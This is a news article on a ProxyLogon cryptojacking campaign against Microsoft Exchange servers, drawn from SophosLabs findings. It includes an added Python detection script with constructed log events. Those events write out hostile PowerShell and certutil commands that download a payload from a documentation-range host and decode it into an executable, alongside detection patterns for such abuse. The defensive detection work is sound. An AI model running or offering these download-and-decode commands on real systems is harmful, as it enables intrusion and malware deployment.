15 April 2021

Hackers targeting unpatched Microsoft Exchange servers with cryptojacking malware

Cybercriminals continue to target vulnerable Microsoft Exchange servers with a variety of malware, ranging from web shells to ransomware and cryptominers. According to a new report from SophosLabs, an unknown threat actor has been attempting to leverage the ProxyLogon exploit to infect Exchange servers with a malicious Monero cryptominer, with the payload hosted on another compromised Exchange server.

The infection chain starts with a PowerShell command that retrieves a file named win_r.zip from another compromised server's Outlook Web Access logon path (/owa/auth). Despite the name, this file is a batch script; it invokes the built-in Windows certutil.exe tool to download two additional files, win_s.zip (written to the filesystem as QuickCPU.b64) and win_d.zip.

The batch script then decodes the base64-encoded QuickCPU.b64 into an executable and runs it. The executable extracts the miner and its configuration data from the QuickCPU.dat file, injects the miner into a system process, and then deletes the on-disk evidence; the miner keeps running in memory.
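The chain above leaves a recognisable trace in process-creation telemetry: a web-server worker spawning a shell, certutil.exe used as a downloader and base64 decoder, and payload URLs under an Exchange server's /owa/auth path. The following detection logic is an added example, not code from the original report or from Sophos. The sample events are constructed (Sysmon Event ID 1 style), the IP address 203.0.113.5 is a documentation address, and the w3wp.exe parent process, the exact certutil switches and the temp paths are assumptions about how this chain would look on a host, not details stated in the article.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style). These are
# NOT real logs; the command lines are modelled on the chain described in the
# article. Parent process, switches and paths are assumptions for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 1. PowerShell, spawned by the IIS worker (assumed webshell), fetches win_r.zip from /owa/auth
    {"ts": "2021-03-10T02:14:07Z", "host": "EXCH01",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -nop -w hidden -c "iwr http://203.0.113.5/owa/auth/win_r.zip -OutFile C:\Windows\Temp\win_r.zip"'},
    # 2. certutil used as a downloader, writing win_s.zip out as QuickCPU.b64
    {"ts": "2021-03-10T02:14:09Z", "host": "EXCH01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.5/owa/auth/win_s.zip C:\Windows\Temp\QuickCPU.b64"},
    # 3. certutil used to base64-decode the downloaded blob into an executable
    {"ts": "2021-03-10T02:14:11Z", "host": "EXCH01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Windows\Temp\QuickCPU.b64 C:\Windows\Temp\QuickCPU.exe"},
    # Benign: certutil used for its intended purpose
    {"ts": "2021-03-10T03:00:00Z", "host": "EXCH01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\mail.cer"},
    # Benign: admin PowerShell launched interactively
    {"ts": "2021-03-10T03:05:00Z", "host": "EXCH01",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Get-MailboxDatabase"},
]

# Processes that should never be children of the IIS worker on an Exchange server
WEB_SERVER_PROCS = {"w3wp.exe"}
SHELL_PROCS = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe"}

# certutil switches that indicate living-off-the-land use rather than certificate work
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b", re.IGNORECASE)
CERTUTIL_DECODE = re.compile(r"-(de|en)code\b", re.IGNORECASE)

# A payload URL whose path sits under an Exchange OWA logon directory, as in the article
OWA_AUTH_URL = re.compile(r"https?://[^\s'\"]+/owa/auth/", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule this single event triggers."""
    parent = _basename(ev["parent"])
    image = _basename(ev["image"])
    cmd = ev["cmdline"]
    hits: List[str] = []

    if parent in WEB_SERVER_PROCS and image in SHELL_PROCS:
        hits.append("web_server_spawned_shell")
    if image == "certutil.exe":
        if CERTUTIL_DOWNLOAD.search(cmd):
            hits.append("certutil_download")
        if CERTUTIL_DECODE.search(cmd):
            hits.append("certutil_decode")
    if OWA_AUTH_URL.search(cmd):
        hits.append("payload_from_owa_auth_path")
    return hits


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every event through the rules and keep only those that fired at least one."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        rules = match_rules(ev)
        if rules:
            findings.append({"ts": ev["ts"], "host": ev["host"],
                             "image": _basename(ev["image"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['image']}: {', '.join(f['rules'])}")
```

Run against the constructed events, the three malicious steps fire and the two benign certutil and PowerShell invocations stay silent. On a real Exchange host the first rule (w3wp.exe spawning a shell) is the highest-confidence signal of web shell activity and is worth alerting on regardless of the command line; the certutil and /owa/auth rules add context on what the shell went on to fetch.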

“Among the files contained in the QuickCPU.dat archive are the configurator for the miner, which appears to be xmr-stak. By default, the payload sets up the miner so that it can only communicate if it can have a secure TLS connection back to the Monero wallet where it will store its value. If the miner detects that there’s a certificate mismatch (or some other indication of a TLS MITM), it quits and attempts to reconnect every 30 seconds,” the researchers said.

According to files the SophosLabs team analyzed, the attacker gave this collection of miners a nickname: “DRUGS.” The researchers also have identified a Monero wallet apparently belonging to the cybercriminals, which began receiving funds on March 9, shortly after Microsoft released patches for the ProxyLogon vulnerabilities.

“As time has gone on, the attacker lost several servers and the cryptomining output decreased, but then gained a few new ones that more than make up for the early losses,” Sophos added.

The US Department of Justice recently announced that the FBI had conducted a successful operation in which it removed web shells from hundreds of hacked Microsoft Exchange servers. While this is good news, owners and operators of Microsoft Exchange servers now face a new challenge: Microsoft this week released patches for another set of four flaws in its Exchange software.
